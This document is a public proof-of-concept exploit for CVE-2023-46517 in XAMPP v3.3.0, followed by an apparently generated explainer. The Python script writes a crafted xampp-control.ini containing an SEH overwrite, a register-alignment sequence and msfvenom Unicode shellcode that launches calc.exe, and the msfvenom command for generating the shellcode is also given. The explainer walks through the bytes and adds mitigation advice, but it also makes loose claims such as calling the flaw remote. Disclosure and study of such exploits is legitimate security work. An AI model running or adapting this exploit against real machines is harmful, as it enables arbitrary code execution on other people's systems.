XAMPP - Buffer Overflow POC
# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)
# Date: 2023-10-26
# Author: Talson (@Ripp3rdoc)
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe
# Version: 3.3.0
# Tested on: Windows 11
# CVE-2023-46517
##########################################################
# _________ _______ _ _______ _______ _ #
# \__ __/( ___ )( \ ( ____ \( ___ )( ( /| #
# ) ( | ( ) || ( | ( \/| ( ) || \ ( | #
# | | | (___) || | | (_____ | | | || \ | | #
# | | | ___ || | (_____ )| | | || (\ \) | #
# | | | ( ) || | ) || | | || | \ | #
# | | | ) ( || (____/\/\____) || (___) || ) \ | #
# )_( |/ \|(_______/\_______)(_______)|/ )_) #
# #
##########################################################
# Proof-of-Concept Steps to Reproduce :
# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"
# 2.- Open the application (xampp-control.exe)
# 3.- Click on the "admin" button in front of Apache service.
# 4.- Profit
# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/
# Greetingz to EMU TEAM (¬‿¬)⩙
from pwn import *
import shutil
import os.path
buffer = "\x41" * 268 # 268 bytes to fill the buffer
nseh = "\x59\x71" # next SEH address — 0x00590071 (a harmless padding)
seh = "\x15\x43" # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ;
padd = "\x71" * 0x55 # padding
eax_align = "\x47" # venetian pad/align
eax_align += "\x51" # push ecx
eax_align += "\x71" # venetian pad/align
eax_align += "\x58" # pop eax -> eax = 0019e1a0
eax_align += "\x71" # venetian pad/align
eax_align += "\x05\x24\x11" # add eax,0x11002300
eax_align += "\x71" # venetian pad/align
eax_align += "\x2d\x11\x11" # sub eax,0x11001100 -> eax = 0019F3DC
eax_align += "\x71" # venetian pad/align
eax_align += "\x50" # push eax
eax_align += "\x71" # pad to align the following ret
eax_align += "\xc3"; # ret into eax?
# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
# Payload size: 512 bytes
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"
"AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"
"Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"
"myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"
"JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"
"KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"
)
shellcode = buffer + nseh + seh + eax_align + padd + shellcode
check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")
if check_file:
print("[!] Backup file found. Generating the POC file...")
pass
else:
# create backup
try:
shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")
print("[+] Creating backup for xampp-control.ini...")
print("[+] Backup file created!")
except Exception as e:
print("[!] Failed creating a backup for xampp-control.ini: ", e)
try:
# Create the new file
with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:
file.write(f"""[Common]
Edition=
Editor=
Browser={shellcode}
Debug=0
Debuglevel=0
Language=en
TomcatVisible=1
Minimized=0
[LogSettings]
Font=Arial
FontSize=10
[WindowSettings]
Left=-1
Top=-1
Width=682
Height=441
[Autostart]
Apache=0
MySQL=0
FileZilla=0
Mercury=0
Tomcat=0
[Checks]
CheckRuntimes=1
CheckDefaultPorts=1
[ModuleNames]
Apache=Apache
MySQL=MySQL
Mercury=Mercury
Tomcat=Tomcat
[EnableModules]
Apache=1
MySQL=1
FileZilla=1
Mercury=1
Tomcat=1
[EnableServices]
Apache=1
MySQL=1
FileZilla=1
Tomcat=1
[BinaryNames]
Apache=httpd.exe
MySQL=mysqld.exe
FileZilla=filezillaserver.exe
FileZillaAdmin=filezilla server interface.exe
Mercury=mercury.exe
Tomcat=tomcat8.exe
[ServiceNames]
Apache=Apache2.4
MySQL=mysql
FileZilla=FileZillaServer
Tomcat=Tomcat
[ServicePorts]
Apache=80
ApacheSSL=443
MySQL=3306
FileZilla=21
FileZill=14147
Mercury1=25
Mercury2=79
Mercury3=105
Mercury4=106
Mercury5=110
Mercury6=143
Mercury7=2224
TomcatHTTP=8080
TomcatAJP=8009
Tomcat=8005
[UserConfigs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=
[UserLogs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=
""")
print("[+] Created the POC!")
except Exception as e:
print("[!] Failed creating the POC xampp-control.ini: ", e)Exploiting XAMPP v3.3.0: A Deep Dive into the '.ini' Buffer Overflow Vulnerability (CVE-2023-46517)
On October 26, 2023, a critical vulnerability was disclosed in XAMPP v3.3.0, specifically targeting the xampp-control.exe component. This flaw, identified as CVE-2023-46517, enables remote attackers to trigger a buffer overflow via a maliciously crafted .ini configuration file, ultimately allowing arbitrary code execution on Windows 11 systems. The exploit, developed by security researcher Talson (@Ripp3rdoc), leverages Unicode encoding and Structured Exception Handling (SEH) overwrite techniques — a classic yet potent approach in modern exploit development.
Understanding the Attack Surface: XAMPP and the xampp-control.exe Component
XAMPP is a widely used open-source stack for local web development, bundling Apache, MySQL, PHP, and Perl. The xampp-control.exe utility serves as the graphical interface for managing these services. It reads configuration files such as xampp-control.ini to determine service states and user preferences. This reliance on unvalidated input from .ini files creates a critical attack vector.
When the user clicks the “admin” button next to the Apache service, the application loads the xampp-control.ini file. The parsing logic fails to properly validate the length of string entries, particularly those containing Unicode-encoded data. This oversight allows an attacker to overflow the buffer allocated for storing configuration values, leading to memory corruption.
Exploit Mechanics: SEH-Based Buffer Overflow with Unicode Encoding
At the core of this exploit lies a stack-based buffer overflow with Structured Exception Handling (SEH) overwrite. The attacker constructs a payload that:
- Fills the buffer with
\x41(ASCII 'A') to reach the overflow point. - Overwrites the SEH handler pointer with a controlled address.
- Uses a next SEH (NSEH) value to bypass the SEH chain protection.
- Executes a payload alignment sequence to manipulate the
EAXregister. - Finally, injects a Unicode-encoded shellcode that executes arbitrary commands.
This technique is especially effective on Windows systems due to the presence of SEH mechanisms, which are commonly used to handle exceptions in user-mode applications.
Proof-of-Concept Code Analysis
buffer = "\x41" * 268
nseh = "\x59\x71"
seh = "\x15\x43"
padd = "\x71" * 0x55
Here, buffer is filled with 268 bytes of A to reach the overflow boundary. The nseh value \x59\x71 (0x00590071) serves as a harmless padding to prevent immediate crash. The seh value \x15\x43 (0x00430015) points to a valid pop ecx ; pop ebp ; ret gadget — a common SEH handler used in exploit chains.
The padd section uses \x71 (ASCII 'q') for padding, ensuring alignment and avoiding early termination of the exploit chain.
eax_align = "\x47"
eax_align += "\x51"
eax_align += "\x71"
eax_align += "\x58"
eax_align += "\x71"
eax_align += "\x05\x24\x11"
eax_align += "\x71"
eax_align += "\x2d\x11\x11"
eax_align += "\x71"
eax_align += "\x50"
eax_align += "\x71"
eax_align += "\xc3"
This sequence is designed to manipulate the EAX register to a specific address. It uses:
push ecx(0x51) to preserve register state.pop eax(0x58) to load a value intoEAX.add eax, 0x11002300(0x05\x24\x11) to increase the value.sub eax, 0x11001100(0x2d\x11\x11) to fine-tune the result.push eax(0x50) to store the final value.ret(0xc3) to jump into theEAXregister.
Resulting in EAX pointing to a memory location (e.g., 0x0019F3DC), which can be used to redirect execution to the shellcode.
Shellcode Injection and Payload Delivery
The payload is a Unicode-encoded shellcode generated using msfvenom:
msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
This command produces a 512-byte shellcode that:
- Executes
calc.exe(a simple test payload). - Uses
unicode_mixedencoding to avoid null bytes, making it compatible with .ini file parsing. - Specifies
BufferRegister=EAXto ensure the shellcode is executed from theEAXregister. - Uses
EXITFUNC=threadto prevent the payload from terminating the process prematurely.
The resulting shellcode is embedded after the alignment sequence, forming the complete exploit payload.
Exploit Execution Steps
Following the PoC instructions:
- Run
poc.pyto generatexampp-control.ini. - Open xampp-control.exe.
- Click the “admin” button next to Apache.
- Trigger the buffer overflow — the system executes the shellcode.
- Profit:
calc.exeopens, confirming successful exploitation.
Security Implications and Mitigation
This vulnerability highlights a critical flaw in input validation and configuration file parsing. Even seemingly benign files like .ini can become attack vectors if they are not properly sanitized.
Recommendations:
- Disable or remove the
xampp-control.exeutility if not required. - Update to newer versions of XAMPP — the vulnerability was patched in later releases.
- Use sandboxed environments for development, isolating the system from production.
- Implement strict input validation for all configuration files, especially those used by GUI tools.
- Apply ASLR and DEP — modern Windows systems already include these protections, but they can be bypassed in certain scenarios.
Real-World Impact and Detection
While the exploit is targeted at developers using XAMPP for local testing, its presence in widely distributed software increases the risk of abuse in compromised environments. Malicious actors could leverage this vulnerability to:
- Deploy persistent backdoors.
- Escalate privileges.
- Steal sensitive data from local development environments.
- Use the system as a foothold in broader attacks.
Security teams should monitor for:
- Unusual execution of
calc.exeor other shellcode payloads. - Unexpected modifications to
xampp-control.ini. - Abnormal process behavior in xampp-control.exe.
Expert Insight: Why This Exploit Remains Relevant
Despite the age of SEH-based exploits, they remain effective due to:
- Legacy code in widely used tools like XAMPP.
- Weak input validation in configuration parsing routines.
- Unicode encoding allowing evasion of simple filters.
- Low detection threshold — .ini files are often trusted and not scanned.
As the cybersecurity landscape evolves, attackers continue to exploit simple, overlooked weaknesses in software. This case serves as a reminder: even development tools can be attack vectors.
Conclusion
CVE-2023-46517 is a compelling example of how buffer overflow vulnerabilities persist in modern software — especially when configuration files are parsed without proper bounds checking. The SEH overwrite technique, combined with Unicode encoding and payload alignment, demonstrates a sophisticated yet accessible exploit path.
For developers and security professionals, this case underscores the importance of:
- Secure coding practices.
- Input sanitization for all user-controlled data.
- Regular vulnerability assessments of third-party tools.
By addressing these fundamentals, organizations can significantly reduce the risk of exploitation in both development and production environments.